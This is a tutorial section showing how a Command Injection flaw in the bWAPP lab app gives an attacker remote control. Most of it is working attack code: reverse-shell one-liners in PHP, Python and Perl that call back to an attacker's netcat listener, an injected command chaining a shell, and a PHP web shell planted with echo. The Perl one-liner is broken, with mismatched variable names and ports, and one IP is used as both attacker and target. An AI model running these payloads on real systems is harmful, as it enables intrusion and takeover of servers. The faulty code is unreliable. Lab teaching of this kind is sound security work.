7.2. Remote Control of the Vulnerable System

 

In the presence of a Command Injection vulnerability, an attacker can establish remote control over the vulnerable system. Hacking a system typically involves several steps:

  • Creating a Backdoor: Depending on the programming language and the operating system on which the application runs, the attacker creates a backdoor—a malicious code or program that allows unauthorized access and control.
  • Storing the File: The attacker saves the backdoor file on a web server under their control.
  • Downloading the File: The attacker initiates a download of the backdoor file from their server to the vulnerable system. This command for downloading is entered within the vulnerable application.
  • Making the File Executable: In the vulnerable application, a command is entered to make the downloaded file executable. Note that this step is not required for Windows systems.
  • Two Possible Scenarios for the Backdoor: Depending on the type of backdoor, there are two possible scenarios:
  • The backdoor establishes a connection to the attacker's computer. To achieve this, a command is issued to initiate the connection. Once connected, the attacker can send commands and control the remote system.
  • The backdoor creates a web shell, allowing control of the remote system through a web browser interface.

In this article, we will explore both scenarios.

 

Remote Terminal Access via PHP System Calls

Some interpreters allow for the execution of system utilities using built-in features. This means there is no need to create and upload a backdoor to the server; instead, we can leverage these built-in capabilities. For example, PHP provides several functions that can execute system commands. Here is a list of such functions:

  • exec()
  • shell_exec()
  • system()
  • passthru()
  • popen()

By utilizing one of these specified functions, an attacker can create a remote terminal access or a remote shell, through which they can control the vulnerable system.

To begin, let's set up a listener on Kali that will accept incoming connection requests from the vulnerable system. We will use the Netcat program as the listener, which is available on all Kali distributions. Open a terminal and enter the following command:

nc -lnvp 9000

This program will wait for incoming connections on port 9000. On the vulnerable machine (bWAPP), we will execute a command to establish a connection, using one of the provided functions. Here are examples of such commands:

php -r '$sock=fsockopen("IP_Kali",9000);exec("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("IP_Kali",9000);shell_exec("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("IP_Kali",9000);system("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("IP_Kali",9000);passthru("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("IP_Kali",9000);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

We will use the system() function, so the final command will look like this:

10.0.2.5; php -r '$sock=fsockopen("10.0.2.5",9000);system("/bin/sh -i <&3 >&3 2>&3");'

After entering this command, switch to Kali, and here's what you'll have:

established remote shell via os injection

Now we can enter almost any commands:

sending commands via remote shell

While PHP is a popular web programming language, and a vast number of websites are built on it, there are still websites developed using other languages. Let's explore how to create a terminal access using different interpreters.

 

Remote Terminal Access for Python

If an application is written in Python or Python is installed on the vulnerable server, an attacker can create a simple script to connect to the hacker's server and establish terminal access. Below is an example of such a script:

import socketimport subprocessimport oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("IP_Kali",9000))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"]);

The command will look like this:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_Kali",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

On Kali you can run Netcat listener on port 9000.

 

Remote Terminal Access for Perl

Similar to the previous example, we will create a small Perl script. Here is what the code looks like:

use Socket;$ip="IP_Kali";$port=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($port,inet_aton($ip)))) {    open(STDIN,">&S");    open(STDOUT,">&S");    open(STDERR,">&S");    exec("/bin/sh -i");}

The command to run such a script looks like this:

perl -e 'use Socket;$i="IP_Kali";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($port,inet_aton($ip)))){open(STDIN,">&S");open(STDOUT,">&S");open (STDERR,">&S");exec("/bin/sh -i");};'

 

Creating a Web Shell

A Web Shell is a way to gain remote control/access through a browser. The principle is very simple: you create a regular script in the application's language, and then you pass commands for execution through GET parameters. The script extracts the commands from the GET parameters and passes them to the system. The results of the commands are displayed in the browser.

Let's create a simple PHP script:

<?php passthru(\$_GET['cmd']); ?>

 You need to save this script on the vulnerable server. To do this, execute the following command:

echo "<pre><?php passthru(\$_GET['cmd']); ?></pre>">webshell.php

 Once the file is created and saved on the server, you can run it from your browser. Since I used the bWAPP application, the file is saved in the application's directory and can be accessed at http://10.0.2.5/bWAPP/webshell.php?cmd=commands:

web shell via os injection

There are other methods to gain remote access using the Command Injection vulnerability.